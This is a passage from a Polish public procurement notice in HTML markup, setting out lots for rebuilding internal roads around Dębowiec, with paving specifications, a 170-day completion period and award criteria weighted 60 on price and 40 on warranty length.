ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Szerokość jezdni wynosić będzie 2,7 m. Dodatkowo na początkowym odcinku drogi przy istniejącym przepuście pod drogą przyjęto wykonanie studni rewizyjnej wraz z dodatkowym utwardzeniem i poszerzeniem pobocza. <br/>Obustronne pobocza o szerokości 25 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy <br/>w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IV – Przebudowa drogi wewnętrznej dz. nr ewid. 1021 i 1034 <br/>w miejscowości Dzielec<br/>Planowana przebudowa drogi obejmuje odcinek o długości 28 m zlokalizowany na działce nr ewid. 1034 w miejscowości Dzielec. Szerokość jezdni z nawierzchnią bitumiczną po wykonaniu przebudowy wynosić będzie 2,5 m, a szerokość poboczy 25 cm.<br/>Przebudowę drogi należy rozpocząć od mechanicznego ścięcia poboczy grubości do 10 cm, wraz z wywozem urobku na odległość do 10 km. Następnie należy wykonać frezowanie nawierzchni bitumicznej na szerokości 4,5 m w miejscu połączenia z istniejącą nawierzchnią asfaltową drogi gminnej. Istniejącą nawierzchnię żwirową i gruntowo - żwirową jezdni drogowej oraz rozjazdy wraz z bezpośrednio zalegającym pod nimi podłożem, na całym przebiegu przebudowywanego odcinka drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy na szerokości 3 m. Na tak przygotowanym podłożu zostanie wykonana podbudowa z kruszyw łamanych, mieszanka <br/>z kruszyw łamanych 0-31,5 mm o grubości 8 cm po zagęszczeniu na całym odcinku drogi. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości – 3 m wraz z rozjazdami. Na tak przygotowanym podłożu, odpowiednio zagęszczonym, przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno-asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Szerokość jezdni wynosić będzie 2,5 m. <br/>Obustronne pobocza o szerokości 25 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy <br/>w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część V - Przebudowa drogi wewnętrznej dz. nr ewid. 1594 w miejscowości Dobrynia<br/>Planowana przebudowa drogi dz. nr ewid. 1594 w Dobryni obejmuje odcinek o długości 138m wraz z rozjazdem przy drodze gminnej. Szerokość jezdni z nawierzchnią bitumiczną po wykonaniu przebudowy wynosić będzie 2,5 m, a szerokość poboczy 20 cm.<br/>Przebudowę drogi należy rozpocząć od mechanicznego usunięcia zakrzaczeń na odcinku <br/>o długości 28,5 m oraz szerokości 1 m oraz od oczyszczenia rowu z namułu na długości <br/>28,5 m. Następnie w zakresie prac zaplanowano rozebranie warstwy gruntowej jezdni do gr. 10 cm wraz z transportem urobku. W km około 0+050 przyjęto wykonanie pod drogą przepustu rurowego o średnicy 31,5 cm wraz z podbudową i obsypką. Tak przygotowaną nawierzchnię gruntowo - żwirową jezdni drogowej na całym przebiegu przebudowywanej drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy na szerokości 3,2 m. Następnie wykonana zostanie podbudowa z kruszyw z podziałem na poszczególne warstwy: warstwa dolna (pospółka) o gr. po zagęszczeniu 20 cm, warstwa górna (mieszanka z kruszyw łamanych 0-31,5 mm) o grubości: 15 cm po zagęszczeniu. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości – 3,2 m wraz z rozjazdami. Na początkowym odcinku drogi o długości 74 m przyjęto ułożenie dwuwarstwowej nawierzchni <br/>z masy mineralno-asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Szerokość jezdni wynosić będzie 2,5 m. <br/>Obustronne pobocza o szerokości 20 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy <br/>w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część VI – Przebudowa drogi wewnętrznej dz. nr ewid. 621 i dz. nr ewid. 691 w Woli Dębowieckiej <br/>Planowana przebudowa drogi dz. nr ewid. 621, 691 oraz 692 w Woli Dębowieckiej obejmuje odcinek o długości 621 m wraz z rozjazdami przy drogach gminnych. Szerokość jezdni <br/>z nawierzchnią bitumiczną po wykonaniu przebudowy wynosić będzie 3 m, a szerokość poboczy 40 cm.<br/>Przebudowę drogi należy rozpocząć od mechanicznego ścięcia poboczy grubości do 10 cm, wraz z wywozem urobku na odległość do 10 km. Istniejącą nawierzchnię żwirową i gruntowo - żwirową jezdni drogowej wraz z bezpośrednio zalegającym pod nią podłożem, na całym przebiegu przebudowywanej drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy na szerokości 3,8 m, z uwzględnieniem rozebrania warstwy gruntowej przy zjazdach na drogi gminne przecinające przedmiotową drogę. Na tak przygotowanym podłożu zostanie wykonana podbudowa z kruszyw łamanych, mieszanka z kruszyw łamanych 0-31,5 mm o grubości: 8 cm po zagęszczeniu na całym odcinku drogi tj. 621, oraz dodatkowa warstwa utwardzenia o grubości 7 cm na odcinku o długości 234m. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości – 3,8 m wraz <br/>z rozjazdami. Na tak przygotowanym podłożu, odpowiednio zagęszczonym, przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno-asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Nawierzchnię jezdni należy wyprofilować ze spadkiem poprzecznym daszkowym do 1,5 % Szerokość jezdni wynosić będzie 3m. <br/>Obustronne pobocza o szerokości 40 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy <br/>w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część VII – Przebudowa drogi wewnętrznej dz. nr ewid. 2234, 2240 <br/>w miejscowości Dębowiec (przysiółek Kopaniny) <br/>Planowana przebudowa drogi obejmuje odcinek o długości 265 m. Szerokość jezdni <br/>z nawierzchnią bitumiczną po wykonaniu przebudowy będzie wynosić będzie 3,3 m <br/>z uwzględnieniem poszerzenia do 5,3 m na końcowym odcinku drogi o długości 23 m.<br/>Przebudowę drogi należy rozpocząć od obustronnego mechanicznego ścięcia zawyżonych poboczy o średniej grubości do 10 cm, na szerokości 0,3 m, wraz z transportem urobku wg uznania Wykonawcy. Następnie należy wykonać frezowanie nawierzchni bitumicznej na szerokości 3,3 m w miejscu połączenia z istniejącą nawierzchnią asfaltową. Następnie istniejąca nawierzchnia zostanie mechanicznie oczyszczona oraz skropiona asfaltem Ze względu na znaczne uszkodzenia i deformacje na całym odcinku drogi przyjęto wyrównanie istniejącej nawierzchni mieszanką mineralno-asfaltową o średniej grubości 3 cm. Nawierzchnia ta zostanie dodatkowo wzmocniona siatką z włókien szklanych o wytrzymałości 50x50kN. Siatkę należy wbudować na profilowej warstwie z mieszanki mineralno-asfaltowej. Przed przystąpieniem do układania warstwy wiążącej, wzmocniona siatką warstwa profilowa podlegać będzie dokładnemu skropieniu asfaltem. Na tak przygotowanym podłożu przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno-asfaltowej: warstwa wiążąca <br/>o grubości 3 cm + warstwa ścieralna o grubości 4 cm. Szerokość jezdni wynosić będzie 3,3 m, <br/>z uwzględnieniem poszerzenia jezdni do szerokości 5,3 m na końcowym odcinku drogi <br/>o długości 23 m. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Obustronne pobocza o szerokości 25 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 10 cm po zagęszczeniu.<br/>Istniejące zjazdy w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część VIII – Przebudowa drogi wewnętrznej nr ewid. 555 w miejscowości Duląbka oraz nr ewid. 1649 w miejscowości Łazy Dębowieckie <br/>Planowana przebudowa drogi obejmuje odcinek o długości około 830 m. Szerokość jezdni będzie zmienna i wynosić będzie od 4 m na początkowym odcinku przebudowywanej drogi, następnie po 400 m następuje stopniowe przewężenie jezdni do szerokości 3,5 m na odcinku 30 m. Kolejne 350 m szerokość jezdni 3,5 m. Na końcowym odcinku drogi o długości 50 m przyjęto poszerzenie jezdni z 3,5 m do 4 m w celu nawiązania do szerokości istniejącej nawierzchni asfaltowej<br/>Przebudowę drogi należy rozpocząć od obustronnego mechanicznego ścięcia zawyżonych poboczy o średniej grubości do 20 cm, na szerokości 25 cm, wraz z transportem urobku na odległość do 10 km. Następnie należy wykonać frezowanie nawierzchni bitumicznej na szerokości 4m w miejscu połączenia z istniejącą nawierzchnią asfaltową. Istniejącą nawierzchnię żwirową i gruntowo - żwirową jezdni drogowej wraz z bezpośrednio zalegającym pod nią podłożem, na całym przebiegu przebudowywanej drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy. Na tak przygotowanym podłożu zostanie wykonana podbudowa z kruszyw łamanych- mieszanka <br/> kruszyw łamanych 0-31,5 mm o grubości: 10 cm po zagęszczeniu na całym odcinku drogi tj. 830 m. Na tak utwardzonym i odpowiednio zagęszczonym podłożu przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno-asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Szerokość będzie zmienna i wynosić będzie od 4 m na początkowym odcinku przebudowywanej drogi, następnie po 400 m następuje stopniowe przewężenie jezdni do szerokości 3,5 m na odcinku 30 m. Kolejne 350 m szerokość jezdni 3,5 m. Na końcowym odcinku drogi o długości 50 m przyjęto poszerzenie jezdni z 3,5 m do 4 m w celu nawiązania do szerokości istniejącej nawierzchni asfaltowej. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Obustronne pobocza o zmiennej szerokości od 20 cm do 25 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych <br/>0-31,5 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IX – Przebudowa drogi wewnętrznej dz. nr ewid. 2327 w Dębowcu<br/>Planowana przebudowa drogi dz. nr ewid. 2327 w Dębowcu obejmuje odcinek o długości 58m, oraz remont odcinka o długości 12 m. Szerokość jezdni z nawierzchnią bitumiczną po wykonaniu przebudowy wynosić będzie 2,5 m, a szerokość poboczy 25 cm.<br/>Przebudowę drogi należy rozpocząć od mechanicznego ścięcia poboczy grubości do 10 cm, wraz z wywozem urobku na odległość do 10 km. Następnie należy wykonać frezowanie nawierzchni bitumicznej na szerokości 2,5 m w miejscu połączenia z istniejącą nawierzchnią asfaltową. Istniejącą nawierzchnię żwirową i gruntowo - żwirową jezdni drogowej wraz <br/>z bezpośrednio zalegającym pod nią podłożem, na całym przebiegu przebudowywanej drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy na szerokości 3 m. Na tak przygotowanym podłożu zostanie wykonana podbudowa z kruszyw łamanych, mieszanka z kruszyw łamanych 0-31,5 mm o łącznej grubości 15 cm po zagęszczeniu. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości – 3 m. Na tak przygotowanym podłożu, odpowiednio zagęszczonym, przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno - asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Szerokość jezdni wynosić będzie 2,5m. Obustronne pobocza o szerokości 25 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5 mm.<br/>Dodatkowo na odcinku poprzedzającym przebudowywany odcinek drogi zaplanowano miejscowy remont nakładki na długości 12 m i szerokości 2,5 m. W zakresie remontu zawiera się frezowanie nawierzchni, skropienie nawierzchni drogowej asfaltem, wykonanie nawierzchni z mieszanek mineralno-bitumicznych (warstwa ścieralna o gr. 4 cm) oraz wyprofilowanie poboczy drogowych mieszanką z kruszyw łamanych na szerokości 25 cm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część X – Przebudowa drogi wewnętrznej dz. nr ewid. 2344 w Dębowcu<br/>Planowana przebudowa drogi dz. nr ewid. 2344 w Dębowcu obejmuje odcinek o długości 221m wraz z rozjazdami. Szerokość jezdni z nawierzchnią bitumiczną po wykonaniu przebudowy wynosić będzie 2,7 m, a szerokość poboczy 20 cm.<br/>Przebudowę drogi należy rozpocząć od mechanicznego ścięcia poboczy grubości do 10 cm, wraz z wywozem urobku na odległość do 10 km, oraz od skarpowania części pobocza na odcinku 80 m. Następnie należy wykonać frezowanie nawierzchni bitumicznej <br/>w miejscu połączenia z istniejącą nawierzchnią asfaltową. W kolejnym etapie należy przygotować podłoże pod projektowane korytka odwadniające, na co składa się zebranie warstwy ziemnej oraz wykonanie podbudowy z mieszanki kruszyw łamanych. Na tak przygotowanym podłożu przyjęto wykonanie ławy betonowej oraz ułożenie korytek odwadniających o wym. 35x25x8 cm na długości 39 m.<br/>Istniejącą nawierzchnię żwirową i gruntowo - żwirową jezdni drogowej wraz z bezpośrednio zalegającym pod nią podłożem, na całym przebiegu przebudowywanej drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy na szerokości 3,1 m. Na tak przygotowanym podłożu zostanie wykonana podbudowa z kruszyw łamanych, mieszanka z kruszyw łamanych 0-31,5 mm o łącznej grubości 15 cm po zagęszczeniu. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości – 3,1 m. Na tak przygotowanym podłożu, odpowiednio zagęszczonym, przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno-asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Szerokość jezdni wynosić będzie 2,7m. Obustronne pobocza o szerokości 20 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy <br/>w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> 